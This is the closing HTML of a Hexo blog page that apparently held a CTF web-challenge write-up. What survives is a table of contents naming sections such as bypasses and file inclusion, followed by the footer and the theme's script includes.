class="nav-text">17.备份是个好习惯</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#18-成绩单"><span class="nav-number">18.</span> <span class="nav-text">18.成绩单</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#19-never-give-up"><span class="nav-number">19.</span> <span class="nav-text">19.never give up</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#20-前女友"><span class="nav-number">20.</span> <span class="nav-text">20.前女友</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#21-各种绕过"><span class="nav-number">21.</span> <span class="nav-text">21.各种绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#文件包含2"><span class="nav-number">22.</span> <span class="nav-text">文件包含2</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Kage</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>